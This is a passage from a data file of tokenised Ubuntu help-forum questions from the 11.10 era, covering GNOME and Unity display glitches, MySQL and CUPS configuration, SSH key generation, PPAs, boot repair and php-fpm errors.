gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : shell not running traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 57 , in __init__ self._shell = gnomeshellfactory ( ) .get_shell ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/utils.py '' , line 38 , in getinstance instances [ cls ] = cls ( ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 123 , in __init__ v = map ( int , proxy.version.split ( `` . '' ) ) file `` /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 46 , in version return json.loads ( self.execute_js ( 'const config = imports.misc.config ; config.package_version ' ) ) file '' /usr/lib/python2.7/dist-packages/gtweak/gshellwrapper.py '' , line 39 , in execute_js result , output = self.proxy.eval ( ' ( s ) ' , js ) file `` /usr/lib/python2.7/dist-packages/gi/overrides/gio.py '' , line 148 , in __call__ kwargs.get ( 'flags ' , 0 ) , kwargs.get ( 'timeout ' , -1 ) , none ) file `` /usr/lib/python2.7/dist-packages/gi/types.py '' , line 43 , in function return info.invoke ( *args , **kwargs ) gerror : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.shell was not provided by any .service files warning : could not list shell extensions traceback ( most recent call last ) : file '' /usr/lib/python2.7/dist-packages/gtweak/tweaks/tweak_shell.py '' , line 62 , in __init__ extensions = self._shell.list_extensions ( ) attributeerror : shellthemetweak instance has no attribute '_shell' ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed ( gnome-tweak-tool:5323 ) : gtk-critical ** : gtk_widget_get_preferred_height_for_width : assertion `width > = 0' failed please help me in fixing this . i have also restarted the computer many times it does not make a difference .
96528	gnome shell network manager notification missing icon	i am using ubuntu 11.10 + gnome shell , and when i disconnect from a network the notification icon is missing , here is a screenshot : does someone knows where can i find which icon the notification is trying to use so i can add it to the current icons theme ?
96531	how do you log in when you first start the new install ?	how do you sign in ? ubuntu 11.10 : i 've installed it twice and the first time it would n't recognize my password ; the second time there 's no `` login '' button or anything to start the whole process going . works in guest mode but i want to install other programs . so please help a new user : how do you log in . and is there anyway to rescue a fresh install , if it wo n't accept your password , that you just created .
96533	how do i use empathy default emoticons on pidgin ?	i dropped empathy for pidgin but i wanted those emoticons from empathy on 11.10 to appear in pidgin . i noticed pidgin uses emoticon themes , but i ca n't find this one . oh , and i do n't mean this pack : http : //www.omgubuntu.co.uk/2010/10/ubuntu-style-emoticons-for-pidgin/ , but oneiric 's default .
96539	nokia bluetooth headset bh 503 not recognized	i bought an nokia bluetooth phone bh 503 . it works just fine with my android phone , but with ubuntu it even get recognized . i already paired the ubuntu with my android , but with the bluetooth phone it even find it . what can be the problem ? already search in google for answers , but almost always the problem is with bluetooth that does n't work , but in my case it works , but not with the headset . already install almost all packages about bluetooth , like blueman , bluez , gnome-bluetooth , bluetooth , etc .
96541	weird ubuntu 11.10 gui problem	it sounds different from the normal unity theme , how to correct it ? why are the images changed ? it happens even though i have booted few times . thanks .
96547	when i have 6 gb of ram installed , why is just 3 gb available on ubuntu ?	i 'm using a laptop with 32-bit ubuntu 10.04 . i used to have only 2 gb of ram . today , our it-support upgraded my laptop to a total of 6 gb of ram . they told me `` though you do now have 6 gb , when you use your current ubuntu , you 'll only have 3 gb available . you have to install the latest version of 64-bit ubuntu to enable all of the 6 gb . '' he was in a hurry to leave without explaining more . i turned on my laptop , used gnome-system-monitor to check , and as he said , it shows i only have 3 gb of ram . could someone explain me why ? why do i have just 3 gb available , and why installing a 64-bit version makes all of the 6 gb available ?
96548	mysql does n't start due to a missing binary	i need to install mysql 5.6 on my ubuntu machine for development reasons ( the newest version contains features that i need to incorporate into some web projects ) . but i am having some issues . i 've been following this tutorial which is not specific for version 5.6 but i figured it would be about the same : http : //www.ovaistariq.net/490/a-step-by-step-guide-to-upgrading-to-mysql-5-5/ i 'm not sure if i 'm setting up my /etc/my.cnf file properly . here is what i have : # example mysql config file for large systems . # # this is for a large system with memory = 512m where the system runs mainly # mysql . # # mysql programs look for option files in a set of # locations which depend on the deployment platform . # you can copy this option file to one of those # locations . for information about these locations , see : # http : //dev.mysql.com/doc/mysql/en/option-files.html # # in this file , you can use all long options that a program supports . # if you want to know which options a program supports , run the program # with the `` -- help '' option . # the following options will be passed to all mysql clients [ client ] # password = your_password port = 3306 socket = /var/run/mysqld/mysqld.sock # here follows entries for some specific programs # the mysql server [ mysqld ] port = 3306 socket = /var/run/mysqld/mysqld.sock skip-external-locking key_buffer_size = 256m max_allowed_packet = 1m table_open_cache = 256 sort_buffer_size = 1m read_buffer_size = 1m read_rnd_buffer_size = 4m myisam_sort_buffer_size = 64m thread_cache_size = 8 query_cache_size= 16m pid_file = /usr/local/mysql/data/dev.pid basedir = /usr/local/mysql datadir = /usr/local/mysql/data tmpdir = /tmp log_error = /var/log/mysql/error.log user = mysql # try number of cpu's*2 for thread_concurrency thread_concurrency = 8 # do n't listen on a tcp/ip port at all . this can be a security enhancement , # if all processes that need to connect to mysqld run on the same host . # all interaction with mysqld must be made via unix sockets or named pipes . # note that using this option without enabling named pipes on windows # ( via the `` enable-named-pipe '' option ) will render mysqld useless ! # # skip-networking # replication master server ( default ) # binary logging is required for replication log-bin=mysql-bin # binary logging format - mixed recommended binlog_format=mixed # required unique id between 1 and 2^32 - 1 # defaults to 1 if master-host is not set # but will not function as a master if omitted server-id = 1 # replication slave ( comment out master section to use this ) # # to configure this host as a replication slave , you can choose between # two methods : # # 1 ) use the change master to command ( fully described in our manual ) - # the syntax is : # # change master to master_host= < host > , master_port= < port > , # master_user= < user > , master_password= < password > ; # # where you replace < host > , < user > , < password > by quoted strings and # < port > by the master 's port number ( 3306 by default ) . # # example : # # change master to master_host='125.564.12.1 ' , master_port=3306 , # master_user='joe ' , master_password='secret ' ; # # or # # 2 ) set the variables below . however , in case you choose this method , then # start replication for the first time ( even unsuccessfully , for example # if you mistyped the password in master-password and the slave fails to # connect ) , the slave will create a master.info file , and any later # change in this file to the variables ' values below will be ignored and # overridden by the content of the master.info file , unless you shutdown # the slave server , delete master.info and restart the slaver server . # for that reason , you may want to leave the lines below untouched # ( commented ) and instead use change master to ( see above ) # # required unique id between 2 and 2^32 - 1 # ( and different from the master ) # defaults to 2 if master-host is set # but will not function as a slave if omitted # server-id = 2 # # the replication master for this slave - required # master-host = < hostname > # # the username the slave will use for authentication when connecting # to the master - required # master-user = < username > # # the password the slave will authenticate with when connecting to # the master - required # master-password = < password > # # the port the master is listening on . # optional - defaults to 3306 # master-port = < port > # # binary logging - not required for slaves , but recommended # log-bin=mysql-bin # uncomment the following if you are using innodb tables # innodb_data_home_dir = /usr/local/mysql/data # innodb_data_file_path = ibdata1:10m : autoextend # innodb_log_group_home_dir = /usr/local/mysql/data # you can set .._buffer_pool_size up to 50 - 80 % # of ram but beware of setting memory usage too high # innodb_buffer_pool_size = 256m # innodb_additional_mem_pool_size = 20m # set .._log_file_size to 25 % of buffer pool size # innodb_log_file_size = 64m # innodb_log_buffer_size = 8m # innodb_flush_log_at_trx_commit = 1 # innodb_lock_wait_timeout = 50 [ mysqldump ] quick max_allowed_packet = 16m [ mysql ] no-auto-rehash # remove the next comment character if you are not familiar with sql # safe-updates [ myisamchk ] key_buffer_size = 128m sort_buffer_size = 128m read_buffer = 2m write_buffer = 2m [ mysqlhotcopy ] interactive-timeout when i try to run mysqld -- skip-grant-tables -- user=mysql i get this error : the program 'mysqld ' can be found in the following packages : * mysql-server-core-5.1 * mysql-cluster-server-5.1 try : sudo apt-get install < selected package > when i try to stop the server , i get this : * mysql server pid file could not be found ! when i try to start : starting mysql .. * the server quit without updating pid file ( /usr/local/mysql/data/dev.pid ) . i am assuming i am not editing the my.cnf file properly , but i 'm completely lost . otherwise i have followed the instructions perfectly and i have made sure that the previous mysql 5.1 version was completely removed from the system .
96552	how well will nvidia optimus cards be supported in 12.04 ?	will nvidia optimus be supported in 12.04 ? it will be improvements in nvidia optimus drivers ? will no longer need bumblebee to activate nvidia graphic card ?
96556	menu application in terminal and nautilus	i have a problem to display the menu commands in the window of the nautilus and the terminal ( in simple words can not display the file .. help etc.. ) i see the bar but no writing .. can you help me see the other windows in the browser type , etc . .. libreoffice image of objective -- > i use ubuntu 11.10 with gnome shell thks
96557	how do i cleanly remove ndiswrapper ?	a while back ( and for some time ) i used this forum post at ubuntuforums.org to get the broadcom wireless on my dell inspiron 1521 working properly . now , a better method has been made available here and i want to clean out the junk left by my attempt at using the old ndiswrapper method . i 'm thinking i need to remove the last line of /etc/modules and /etc/modprobe.d/blacklist ... there 's probably more though , like sudo make uninstall ( ndiswrapper ) . any thoughts ?
96559	how do i stop this warning : `` w : duplicate sources.list entry cdrom : //ubuntu 11.10 _oneiric ocelot_ ... ''	i 'm running ubuntu on a live usb drive and every time i boot , the apt line cdrom : //ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) / oneiric/main i386 packages and another similar apt line ( also sourced from the cdrom ) get inserted in the sources.list file . and then i get that warning , which is annoying because i ca n't proceed with updates and installations unless that warning is rectified . i have noticed that in one of the start-up scripts , the following lines are printed ( not sure about the capitalization ) : writing new source list source list entries for this disc are and then the above apt lines . i do n't know this is a lead to what 's causing the duplicate entries . also , i do n't even want any cdrom to be in the sources.list file . everytime i delete them whenever i get that warning when attempting to update/install and everytime i reboot , they come back again . your help is appreciated .
96561	mouse freezing frequently in ubuntu 11.10	i loaded ubuntu 11.10 and found it to be very interesting os . but i am facing issue with mouse freezing quite frequently . i almost have spend a whole day searching internet to get a fix but i could n't find any . i am attaching some text captured though pastebinit . please help to get the problem solved . regards , subhojit pastebinit code
96564	some programs looking very wrong	some nautilus , empathy etc windows are having some lost graphic elements : but some apps such as xfce terminal still looks normal is this because of some package missing ? edit after sudo apt-get upgrade the empathy theming is fixed , but nautilus is looking worse this problem does not appear in unity 2d i 've tried gnome-tweak-tool and switching themes and also , reinstalling the light-themes package launching any gtk+ app gets me this warn : gtk-warning ** : theme parsing error : gtk-widgets.css:1597:20 : invalid animation description
96567	meaning of `` print test page '' `` print self-test page '' and `` clean print heads ''	in system- > administration- > printing , when choosing a printer 's property , we have three options : `` print test page '' `` print self-test page '' and `` clean print heads '' . i was wondering what their differences are ? thanks and regards !
96568	fullscreen vnc window on a specific workspace	i am running 11.10 and i need to have a vnc window for the connection to my windows 7 box ( booo hiss etc ) , i have two screens attached to my pc . i would like to have a fullscreen dual window vnc window on one of the two workspaces of my ubuntu desktop , currently i can get close to this by manually resizing the vnc window as big as i can on the second workspace when it opens . this is less than ideal as it takes a while and always needs doing when i login . also alt-tab does n't get handled by windows which is confusing . if i try to fullscreen vnc i get proper alt-tab for windows but only one screen wide and i can not switch workspace again without turning off fullscreen . if i manually make the window big enough i still loose a little bit of height because of the ubuntu top bar , this can make window management in windows a little more complex or remove the status bar from maximised windows in windows . this does however allow me to switch workspaces . i 've tried several vnc clients of which ssvnc seemed to behave a little better but non do fullscreen for dual , i just get a single fullscreen with scrollbars ( that i can not use , but thats another story ) so there are several problems here : fullscreen vnc only working with one desktop width despite both host and guest being dual monitor and this working if i manually size the vnc window . ubuntu menus getting in the way of manually sized window vnc windows not remembering their positions any ideas or suggestions greatefully welcomed : ) update : how to maximise a window across two monitors ? has allowed me to get fullscreen vnc across both monitors , however i ca n't use the shortcut to switch workspaces when in fullscreen mode . the grail is within my grasp ! update2 : because fullscreen is now dual window in vnc i can press f9 to get fullscreen win7 or use it in a window , i 'd love to find a way to pass ctrl+alt+up back to ubuntu then i could achieve my goal . i heard of a trick using numlock but it does n't seem to work .
96569	how can i change the security settings for a website in firefox ?	i have customized my unity launcher so that now have access to quicklists for different applications . to do that i followed the script posted here : what custom launchers and unity quicklists are available ? i added some of my most frequented websites to the firefox launcher . first time i opened one of them firefox asked me to add a security exception , which i did , but does n't open the website , just a blank page with the following dialogue : welcome to ( name of the website ) to change this page , upload a new index.html to your private_html folder i added a security exception of the website in mozilla advanced preferences , which works when opening it through the navigation bar in firefox , but not through the quicklist in unity .
96571	why ssh-keygen creates empty key files ?	i launched ssh-keygen , answered all questions and it reported that keys were successfully generated , but files are empty . why ? ~ > ssh-keygen -c `` my key to github '' generating public/private rsa key pair . enter file in which to save the key ( /home/zubba/.ssh/id_rsa ) : id_github enter passphrase ( empty for no passphrase ) : enter same passphrase again : your identification has been saved in id_github . your public key has been saved in id_github.pub . the key fingerprint is : 83:73:78:8b : bb : dc : bb : a8 : d7 : b0 : b0 : fa:51:30 : fd:55 my key to github the key 's randomart image is : + -- [ rsa 2048 ] -- -- + | e | | . . | | o . . | | o + . | | = s | | ... = o | | .o.+ . | | .oo+ . | | .ooo=.+o | + -- -- -- -- -- -- -- -- -+ ~ > ls -l .ssh итого 8,0k -rw -- -- -- - 1 zubba zubba 399 2012-01-10 18:56 authorized_keys -rw -- -- -- - 1 zubba zubba 399 2012-01-10 18:56 id_rsa.pub -rw -- -- -- - 1 zubba zubba 0 2012-01-18 20:28 id_github -rw-r -- r -- 1 zubba zubba 0 2012-01-18 20:28 id_github.pub ~ >
96575	problem updating 11.10	when i try to update my os to the newer version of ubuntu , suddenly pops a window saying that some packages ca n't be downloaded because the internet connection is not working properly . i 'm pretty sure the connection is just fine , but i would like to know how to test it . and , if it 's not that , how can i solve the updating problem ?
96580	how to clean var/cache/apt in a way that it leaves only the latest versions of each package	i want to know a way to clean the var/cache/apt folder in a way that it only leaves the latest version of a package if it has several versions or it leaves a package if it is the only one of that program . for example i have several vlc packages ( vlc_1.1.11 , vlc_1.1.12.. ) and several wine packages ( wine1.3_1.3.34 , wine1.3_1.3.35 , wine1.3_1.3.36 , wine1.3_1.3.37 ... ) and many others like this . so how to do a clean up in this folder that it leaves only the latest packages . at the moment i have 2.5gb and most of it are just older packages mixed with the newer ones .
96581	ltsp clients stopped recognizing usb keys	we are experiencing some problem 's with are ltsp server regarding usb drive on the users thinclient . it use to work flawlessly and i guess an update is to blame for it not working anymore . it does n't mount the usbdrive and i ca n't see any system entry when i have a look at lsusb or dmesg . any idea 's ?
96582	libreoffice ( writer , calc , impress ) not appearing in launcher	there is a problem with libreoffice calc , impress and writer ( sometimes gedit too ) that when i open a file the minimize , maximize and close buttons in the upper right corner are not displayed . in this case for calc not only is this problem present but in the launcher the icon for calc does not appear . the only way right now i have found to at least get the icons in the top right corner when the problem arises is to open another windows and then go back to calc . still in this solution the launcher does not show a calc icon . how can i trace the problem or solve the problem at hand . already up to date with everything . the only 2 ppas i am using are wine and chrome . here is a pic about the problem : as you can see in the image there is no minimize , maximize and close buttons and the calc program is not in the launcher . update - updated question since it does appear in others as mentioned below . just tested impress and writer when the problem happens and they too have it .
96583	raw file recovery	does anybody know of a linux ubuntu program that will recover raw photo files that have been deleted in error from a camera card ?
96584	cups is showing the test page as completed , but it is n't being printed	on the cups interface in firefox ( using localhost:631 ) , i tell my printer to print a test page . this sends me to a page confirming that the test page is sent ( for a second or two ) before redirecting me back to the printer information page - which shows no print jobs . if i select show completed jobs , it says that the test page was completed . ( the details given are name : unknown user : withheld size:1k pages : unknown state : completed at * ) . whereas my printer has n't done anything . however when i tell the printer to do something like `` clean print heads '' , the screen on the printer lights up ( as if it was about to do something ) , but nothing happens . my log file contains : loglevel warn maxlogsize 0 systemgroup lpadmin listen localhost:631 listen /var/run/cups/cups.sock browsing off browseorder allow , deny browseallow all browselocalprotocols cups dnssd browseaddress @ local defaultauthtype basic webinterface yes < location / > order allow , deny < /location > < location /admin > order allow , deny < /location > < location /admin/conf > authtype default require user @ system order allow , deny < /location > < policy default > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default cups-get-devices > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cancel-job cups-authenticate-job > require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > < policy authenticated > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default < limit create-job print-job print-uri validate-job > authtype default order deny , allow < /limit > < limit send-document send-uri hold-job release-job restart-job purge-jobs set-job-attributes create-job-subscription renew-subscription cancel-subscription get-notifications reprocess-job cancel-current-job suspend-current-job resume-job cancel-my-jobs close-job cups-move-job cups-get-document > authtype default require user @ owner @ system order deny , allow < /limit > < limit cups-add-modify-printer cups-delete-printer cups-add-modify-class cups-delete-class cups-set-default > authtype default require user @ system order deny , allow < /limit > < limit pause-printer resume-printer enable-printer disable-printer pause-printer-after-current-job hold-new-jobs release-held-new-jobs deactivate-printer activate-printer restart-printer shutdown-printer startup-printer promote-job schedule-job-after cancel-jobs cups-accept-jobs cups-reject-jobs > authtype default require user @ system order deny , allow < /limit > < limit cancel-job cups-authenticate-job > authtype default require user @ owner @ system order deny , allow < /limit > < limit all > order deny , allow < /limit > < /policy > jobprivateaccess default jobprivatevalues default subscriptionprivateaccess default subscriptionprivatevalues default
96586	okular default printer settings	in kubuntu 11.10 , okular does not seem to obey the cups default printer settings . so everytime i want to print something double-sided i have to select the option in okular , really inconvenient . is this a known bug ? any workarounds ?
96587	is it possible to only allow specific packages updates from a ppa	let us say i have added a ppa that has x package that i want but it also has y package that i do not want to use or receive updates from . how can i , from the same ppa , receive updates for a specific package but deny updates from the same ppa for other packages . a step by step example would be good since this has happened to me in several ppas that have a particular package i want but also add a whole bunch of others that i do not yet want to update .
96588	ubuntu 11.04 appearing like ubuntu 10.10 suddenly	my ubuntu 11.04 set up is appearing like an ubuntu 10.10 , ( gnome 2 rather than unity ) why please ?
96589	hpn-ssh on ubuntu server	what is the current status of hpn-ssh on ubuntu ? it is not in the default repositories , as far as i can tell , but does anybody knows if there are any plans to add it ( or decisions not to add it ) ?
96600	a whole disk install has rendered my laptop unusable . can it be recovered ?	the laptop is a dell inspiron 2200 with only a 45gb hard-drive . it had windows xp but i chose to replace it with ubuntu . i installed it from cd created by download and then by use of infra recorder to produce the bootable disc . the install gave messages suggesting that the cd drive was faulty or dirty or that the cd needed to be created at a slower speed . despite this the install produced a ubuntu desk top screen with icons including one for firefox . i selected firefox and successfully navigated the internet to the bbc website . i also looked around other components of the desktop . i concluded that i had a successful install and so shut down the system and the laptop . when i subsequently switched on the laptop again the first screen to appear was , as always , a message advising that battery recalibration was needed and that it would run for 3-5 hours . f1 to continue or esc to cancel . as always , in response to this i pressed esc but this time with no result . i can not now get past this screen . this is an oldish laptop recently inherited from my daughter and so of minimum value but i had seen it as my chance to try ubuntu without impacting my regular desktop pc . can the laptop be rescued for another go at ubuntu ? any help would be much appreciated . thankyou .
96601	how can i install a program from a ppa that is listed as being for 12.04 when i 'm using 11.10 ?	i would like to install a program from a ppa that has both oneiric and precise versions of the same program . the precise version of the program is 2.2 whereas the oneiric version is 2.0 if i try an install the normal way through the software centre or the terminal , the oneiric 2.0 version will be installed . is there an easy way to force ubuntu to install the precise version ?
96602	install 'grub-pc ' , changed repository	i am trying to use a program to fix my booting . it asked me to type a long line of code into the terminal to install grub-pc it says in terminal that it may have been moved to another repository . how do i get it to install ? edit : the program ( 'it ' ) is called boot repair . it asks me to put this into the terminal : sudo chroot `` /mnt/boot-sav/sda3 '' apt-get install -- force-yes -y grub-pc the terminal gives this error : reading package lists ... done building dependency tree reading state information ... done package grub-pc is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package grub-pc has no installation candidate
96608	ati radeon hd 5750 and lagging in games and youtube videos	i have a x-one w-601 desktop pc : 3,1ghz amd quadcore athlon ii 645 x4 8 gb ddr3 ram 1000 gb harddisk 7200rpm ati radeon hd5750 with 1gb ddr5 ram i 'm running ubuntu 11.10 64-bit and have installed the proprietary driver , but still games lag and videos a little bit . been googling around and seen that it has something to do with the older drivers from amd and kms , but no guide helped me correctly through to make my graphic card work smoothly . i do n't know if this helps but `` fglrxinfo '' in terminal shows : display : :0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati radeon hd 5700 series opengl version string : 4.1.11005 compatibility profile context and the driver check command shows : [ 51.184 ] ( ii ) ati proprietary linux driver version identifier:8.88.7 any help appreciated : d
96615	ubuntu 11.10 wellcomm mobile broadband	i 'm using ubuntu 11.10 on acer 3620 but unable to connect the internet . it disconnects everytime . the wellcomm specs are as follows : interface type : usb 2.0 high speed proocol : hsdpa/umts/edge/gprs/gsm frequency : hsdpa/umts 2100 mhz edge/gprs/gsm 1900/1800/900/850mhz transmision : hsdpa 3.6 mbps dl max data rate : umts 384kbps ul system required : windows xp , vista/7 , linux , mac with windows xp no problems any suggestions ? regards , budi m
96616	purple start screen - no splash screen	after installing ubuntu 11.10 on a new computer everything worked fine for a few weeks and now suddenly when starting up ubuntu i get a blank purple screen with no `` ubuntu '' splash and the 5 dots but the system does start up . what has happened to loose the ubuntu splash screen ? also , i 've checked in the grub startup and it has quiet splash in the linux line . i have an ati radeon 5450 graphics card which needed nomodeset to be added to the grub line when booting for the first time off the install cd but now this line has disappeared from the grub startup . can anyone help ?
96620	thunderbird blocking remote content	thunderbird displays the message , `` to protect your privacy , thunderbird has blocked remote content in this message . '' just how does blocking remote content protect my privacy ? i searched the support website for thunderbird and could n't find anything .
96621	how do i install apache and php on 11.10 ?	i would like to install apache and php on my new machine , running ubuntu 11.10 , but i ca n't see either of them listed in the software centre . what do i need to do to install them ? so far as i know , any version will do . i just need to find out how to install them in the way i am least likely to get wrong .
96622	how do i reinstall the software center ?	i 've somehow accidentally uninstalled software center and i ca n't seem to reinstall it . i do n't have a web browser currently on the computer , as i uninstalled firefox to get chrome , and did n't install chrome before my software center disappeared . when i search `` software center '' , it comes up in the apps available for download section , but nothing seems to work for installing it . i click it repeatedly and nothing happens , and when i drag it into my home window it just opens the file . help , anyone ?
96624	lenses shortcuts for unity-2d	is it possible to get the same lenses shortcuts for unity 2d like super+a and super+f ? i would like to use unity 2d on some computers , but i miss the shortcuts .
96630	openvpn configuration on ubuntu	i want to use openvpn on ubuntu . the following three files are provided : client.conf tccg-ca.crt tccg-ta.key what are the steps to configure openvpn in ubuntu by using these files . i have installed openvpn at /etc/openvpn . in network-manager when i choose openvpn to create a new connection , it asks for user certifcate , ca certificate , private key and private key password . i am totally blind for next steps . how i can proceed further ?
96632	how do i add a notification for process completions	how can i add a notification of some sort ( like playing a .wav file or creating a pop-up on the status bar ) when a process finishes . for example , i am compiling a program that takes a couple of hours to finish . i would like to hear/see some sort of message when it completes compiling . is there a tool for doing this ( like tying an alarm program to the pid of a process ) or something like that ?
96634	move ubuntu 11.10 to primary partition ?	i would like to move ubuntu 11.10 from /dev/sda2 to /dev/sda1 ( hd0,0 ) without loss of updates , data , etc. , and update grub . if ubuntu is backed up , a new install to a clean ext4 partition on sda1 , including a new grub install ( normal ) , then , restore [ home ] from backup . is that going to preserve all my ubuntu updates ? must i backup the current install completely ? thank you for any assistance in this matter .
96640	i choose to load gnome but it always loads unity	i 've installed gnome-shell from the software centre and it installed with no problems . however when i log out , select gnome from the dropdown menu and log back in , it just loads unity . any ideas ? i 'm running 11.10 on an older toshiba satellite a100 . i 'm using unity 3d right now . as for specs , it 's a dual-core t5200 1.6ghz with the 945gm integrated graphics and 2gb ram . if i disable auto-login i can get it to load . i 've tried a couple of the auto-login tricks that i 've read about but they do n't work . i 've tried editing /etc/lightdm/lightdm.conf and it did n't work . i do n't remember exactly what else i tried .
96641	xubuntu desktop minimal installation	following this question i have have installed a minimal ubuntu system on my computer . i want to install the minimum packages possible the cleanest xfce desktop possible . what are the minimal packages possible necessary to run a working minimal xubuntu desktop and how do i install them ? do i need a login manager to run the desktop when i am done installing ?
96642	lap top will not boot	i have downloaded and installed ubuntu erasing xp in the process . it seemed to install correctly up to the point where i reboot . machine will not boot . i have just a flashing curser on top left of blank screen . can you help please ? kind regards eleanor
96649	commercial redistribution of ubuntu server	how can i get a definitive answer on the use of a customized version of ubuntu server for redistribution with commercial software component added ? i understand that paying attention so that the use of `` main '' packages which are not on restricted licenses should allow redistribution and that removal of branding elements which are trademark for ubuntu should remove such problems . however when it comes to the redistributed systems use of apt for updates , the system is in effect still a ubuntu system . will this have any legal implication on distribution as all redistributed disks will still be using the bandwidth and servers of ubuntu for updates , it seems like stealing bandwidth and server resources to me . any information would be welcome .
96650	how do i compile and use liboverlay-scrollbar from source ?	i 'm trying to install and use a patched version of liboverlay-scrollbar that matches my personal preferences . i 've successfully downloaded lp : ayatana-scrollbar and ./autogen.sh ; make ; sudo make installed it . here 's the problem . taking a look at ldd /usr/bin/* , it does n't look like any applications actually use liboverlay-scrollbar*.so . and even when i use something like : export ld_library_path= '' /usr/local/lib/ : /usr/lib/ '' export liboverlay_scrollbar=1 gedit the scrollbar-using application i call seems to blithely ignore my /usr/local/lib libraries and use the system-installed ayatana scrollbars . my gtk+ libs are stock ubuntu , so i 'm assuming i do n't need to patch and recompile the graphical toolkit . could anyone post a step-by-step process for installing overlay scrollbars from source ?
96656	php-fpm constantly restarting pools - zombie 's everywhere !	ok so after a recent incident in which i ran `` chown -r root : root '' on my entire /var directory on accident ( xo.. i know ... ) i 've been dealing with php-fpm issues . i 've tried fixing permissions in a number of ways with no luck but i 'm getting constant restarts spawning tons of zombie processes whenever php5-fpm is running . the /var/log/php5-fpm.log show this over and over every single second : [ 18-jan-2012 13:22:44.443707 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool web4 ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.443972 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool web7 ] currently 0 active children , 20 spare children , 20 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444019 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool web3 ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444032 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool web1 ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444040 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool ispconfig ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444048 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool apps ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444057 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool www ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 [ 18-jan-2012 13:22:45.444064 ] debug : pid 31440 , fpm_pctl_perform_idle_server_maintenance ( ) , line 348 : [ pool web4 ] currently 0 active children , 4 spare children , 4 running children . spawning rate 1 my php_fpm.conf relevant file info : ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; fpm configuration ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; all relative paths in this configuration file are relative to php 's install ; prefix ( /usr ) . this prefix can be dynamicaly changed by using the ; '-p ' argument from the command line . ; include one or more files . if glob ( 3 ) exists , it is used to include a bunch of ; files from a glob ( 3 ) pattern . this directive can be used everywhere in the ; file . ; relative path can also be used . they will be prefixed by : ; - the global prefix if it 's been set ( -p arguement ) ; - /usr otherwise ; include=/etc/php5/fpm/*.conf ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; global options ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; 